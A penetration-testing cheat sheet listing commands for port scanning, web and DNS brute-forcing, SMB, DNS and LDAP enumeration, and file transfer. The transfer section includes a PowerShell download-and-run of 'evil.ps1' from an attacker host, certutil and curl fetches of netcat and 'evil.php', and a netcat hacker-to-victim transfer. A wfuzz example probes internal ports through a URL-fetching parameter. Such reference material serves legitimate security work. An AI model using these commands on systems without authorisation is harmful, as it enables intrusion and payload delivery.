#Pentesting Cheat sheet

#Potential port vulnerabilities

#Enumeration

#Port Scanning

Basic port scanning with bash, using the /dev/tcp pseudo-device when nmap is not available. Connection errors are sent to /dev/null so only the status lines are printed.

for port in {1..65535}; do
  # the 1-second timeout keeps filtered ports from stalling the loop
  timeout 1 bash -c "echo >/dev/tcp/10.10.10.10/$port" 2>/dev/null &&
    echo "[*] $port is open" ||
    echo "[*] $port is closed"
done

#NMAP

https://nmap.org/

Scripts define a list of categories they belong to. Currently defined categories are auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln. Category names are not case sensitive. The bundled scripts live under /usr/share/nmap/scripts:

ls /usr/share/nmap/scripts

First, an aggressive nmap scan (-T5, all ports, only open ones reported, no DNS resolution) to list every open port:

nmap -T5 -p- --open -v -n 10.10.10.10

Once the open ports are known, run a second scan on just those ports to enumerate them with the default scripts and the service versions. -sC is equivalent to --script=default; -sV probes for versions.

nmap -sC -sV -p22,80,445 10.10.10.10

ARP scan (host discovery on the local segment, no port scan)

nmap -n -sn -PR 10.10.10.10/24

Reverse DNS lookup (list scan: names are resolved, nothing is probed)

nmap -sL 10.10.10.10/24

Running scripts by category (here only scripts tagged both vuln and safe)

nmap -n -Pn --script "vuln and safe" 10.10.10.10/24

#HTTP TOOLS

#Nikto

https://github.com/sullo/nikto

Nikto is a web server scanner that examines a server for potential problems and known security issues.

Basic usage

nikto -host https://10.10.10.10/

#Gobuster

https://github.com/OJ/gobuster

It’s a tool to brute-force directories, trying multiple file extensions at once.

It has three main modes it can be used with:

dir - the classic directory brute-forcing mode
dns - DNS subdomain brute-forcing mode
vhost - virtual host brute-forcing mode

DIR mode (-x adds the extensions to try for every word)

gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,cgi

DNS mode (-i shows the resolved IPs)

gobuster dns -d domain.com -w wordlist.txt -i

vhost mode (-v verbose)

gobuster vhost -u domain.com -w wordlist.txt -v

#WFUZZ

https://github.com/xmendez/wfuzz

Another brute-force tool like gobuster. Rather than repeat the directory example, here it is used to enumerate which ports a machine can reach on itself through a web parameter that makes the server fetch a URL: FUZZ is replaced by each port number, --hc=404 hides 404 responses, and -c colours the output.

wfuzz -c --hc=404 -z range,1-65535 http://10.10.10.10:8080/request_to=http://127.0.0.1:FUZZ

#FFUF

https://github.com/ffuf/ffuf

I really like this tool because it’s written in Go and I think it’s the fastest for these jobs.
This command scans for virtual hosts on a server that answers every unknown Host header with a page of the same size: -fs 33 filters out responses of that baseline size (33 bytes here; measure it first with a nonsense host name) and -fc 401,403 hides those status codes.

ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://domain.com -H "Host: FUZZ.domain.com" -fs 33 -fc 401,403
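As an added example (not part of the original cheat sheet or of ffuf), the filtering that -fs and -fc perform, reproduced in bash over a constructed set of vhost responses, so you can see why the baseline size has to be measured before it is filtered out. Candidate names, status codes and sizes are made up.

```shell
#!/usr/bin/env bash
# Added example: reproduce ffuf's "-fs <size> -fc <codes>" logic on
# constructed records of the form "<candidate> <status> <size>".

# Constructed sample: the default vhost answers any unknown Host header
# with 200 and a 33-byte page, so 33 is the baseline to filter.
SAMPLE='www 200 33
dev 200 1984
mail 401 33
admin 403 33
staging 403 1750
test 200 33
api 200 512'

# Print the most common response size in the input (the baseline).
baseline_size() {
  awk '{print $3}' | sort | uniq -c | sort -rn | awk 'NR==1{print $2}'
}

# Keep candidates whose size differs from the baseline ("-fs") and whose
# status is not in the comma-separated exclude list ("-fc").
filter_responses() {
  base="$1"
  exclude="$2"
  awk -v base="$base" -v ex="$exclude" '
    BEGIN { n = split(ex, arr, ","); for (i = 1; i <= n; i++) skip[arr[i]] = 1 }
    $3 != base && !($2 in skip) { print $1 }'
}

# Measure the baseline first, then filter with it: prints "dev" and "api".
# "staging" differs in size but is dropped by the 403 filter.
run_demo() {
  base=$(printf '%s\n' "$SAMPLE" | baseline_size)
  printf '%s\n' "$SAMPLE" | filter_responses "$base" "401,403"
}

run_demo
```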

#DIRSEARCH

https://github.com/maurosoria/dirsearch

This one is written in Python. I like it because it’s very fast too and easy to use.

This is my basic usage, recursive (-r):

dirsearch -u http://domain.com -E -r -w /usr/share/wordlist/wordlist.txt

#SMB SERVICE

This protocol gives access to files on a remote server, as well as other resources such as printers.

#List all shares

smbclient -L 10.10.10.10

smbmap -H 10.10.10.10

/usr/share/doc/python3-impacket/examples/smbclient.py ""@10.10.10.10

#Start an SMB server with Impacket

https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py

#Make server on Linux

impacket-smbserver IGH /root/shells

#Mount in Windows

powershell

New-PSDrive -Name "IGH" -PSProvider "FileSystem" -Root "\\10.10.10.10\IGH"

without powershell

net use z: \\10.10.10.10\IGH

#Mount in Linux

cifs-utils needs to be installed, and the mount point (~/my-share/) must already exist.

sudo mount -t cifs //10.10.10.10/igh ~/my-share/

#Enumeration with null sessions

smbclient -L 10.10.10.10 -N

rpcclient -U "" -N 10.10.10.10

#Scanning with enum4linux

enum4linux -a 10.10.10.10

#DNS

#Nmap DNS hostname lookup

Fast scan (-F, the 100 most common ports) resolving names through the given DNS server:

nmap -F --dns-servers [IP DNS] [target ip range]

Host lookup (name servers)

host -t ns 10.10.10.10

Perform DNS IP Lookup

dig a 10.10.10.10 @nameserver

Perform MX Record Lookup

dig mx 10.10.10.10 @nameserver

Perform Zone Transfer with dig (Linux)

dig axfr 10.10.10.10 @nameserver

Windows DNS Zone Transfer (interactive nslookup session)

nslookup
> set type=any
> ls -d 10.10.10.10

DNS Brute Force (-D gives the dictionary, -t brt selects the brute-force scan type, --xml writes the results)

dnsrecon -d 10.10.10.10 -D /usr/share/wordlist/dnsmap.txt -t brt --xml output.xml

#LDAP SERVICE

With anonymous authentication (-x, simple bind with no credentials) you can run an LDAP search without binding as the admin account:

ldapsearch -h 10.10.10.10 -p 389 -x -b "dc=internetghost,dc=com"

Sometimes you need to run the query bound as the admin to see additional information: -D gives the bind DN and -W prompts for its password.

ldapsearch -x -b "dc=internetghost,dc=com" -H ldap://10.10.10.10 -D "cn=admin,dc=internetghost,dc=com" -W

#Transfer files

#HTTP

#PYTHON

You can start a temporary HTTP server with Python, serving the current directory:

python3 -m http.server 8000

python2 -m SimpleHTTPServer 8000

You can also specify which directory to serve (--directory, Python 3.7+):

python3 -m http.server 8000 --directory /root/shells

#WINDOWS

powershell, download and run a script in memory

iex(new-object net.webclient).downloadstring("http://10.10.10.10/evil.ps1")

certutil, download a file to disk

certutil.exe -urlcache -split -f "http://10.10.10.10/nc.exe" nc.exe

powershell Invoke-WebRequest, download a file to disk

IWR -Uri "http://10.10.10.10/n64.exe" -Outfile "n64.exe"

#LINUX

curl http://10.10.10.10/evil.php -o evil.php

#NETCAT

Hacker machine (listens and sends the file)

nc -lvnp 4444 < file

Victim machine (connects and writes the file)

nc 10.10.10.10 4444 > file

#SSH - SCP

The methodology is the same, but I prefer to show the different methods in this example.

# copy a file to the remote host
scp /local/folder/file.txt user@10.10.10.10:/path/folder/file.txt

# copy a folder from the remote host (-r is recursive)
scp -r user@10.10.10.10:/folder /path/folder/

#SAMBA

#BASH

sudo impacket-smbserver smbFolder $(pwd)

#Powershell

PS> New-PSDrive -Name "SharedFolder" -PSProvider "FileSystem" -Root "\\10.10.14.18\smbFolder"
PS> dir SharedFolder:\

#Using Credentials

sudo impacket-smbserver smbFolder $(pwd) -smb2support -user jack -password 1234

PS> $pass = ConvertTo-SecureString '1234' -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential('jack', $pass)
PS> New-PSDrive -Name "SharedFolder" -PSProvider "FileSystem" -Credential $cred -Root "\\10.10.14.18\smbFolder"